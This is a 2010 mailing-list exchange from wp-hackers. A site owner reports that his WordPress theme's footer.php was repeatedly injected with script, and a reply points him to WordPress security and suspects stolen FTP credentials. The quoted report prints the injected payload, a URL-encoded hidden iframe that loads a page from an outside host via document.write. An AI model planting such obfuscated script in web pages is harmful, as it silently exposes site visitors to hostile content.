[wp-hackers] wordpress theme script injection (hosted on dreamhost)

Chip Bennett chip at chipbennett.net
Sun Oct 31 18:15:14 UTC 2010

Also, have you sent this report to security at wordpress.org (I think that's
the right address?). If there's any potential that it's a WordPress specific
vector - or even just WordPress being specifically targeted - they'll want
to know. But, as a previous comment indicated, it's probably a
non-WordPress-specific FTP-credential attack vector.


On Sun, Oct 31, 2010 at 10:07 AM, Mladen Adamovic <mladen.adamovic at gmail.com
> wrote:

> Hi guys,
> My wordpress software instance was repeatedly hacked ... running latest
> Wordpress source code and being hosted on Dreamhost.
> I don't know which exploit it did use and couldn't identify it, but it was
> adding the following code to my default theme footer.php:
> <script>
> enc =
> "%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//
> withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> dec = unescape(enc);
> document.write(dec);
> </script>
> I think I'll have to migrate to Blogger, since I couldn't identify exploit
> it did use.
> I wanted to drop you an email anyhow since identifying exploits is
> important!
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers

More information about the wp-hackers mailing list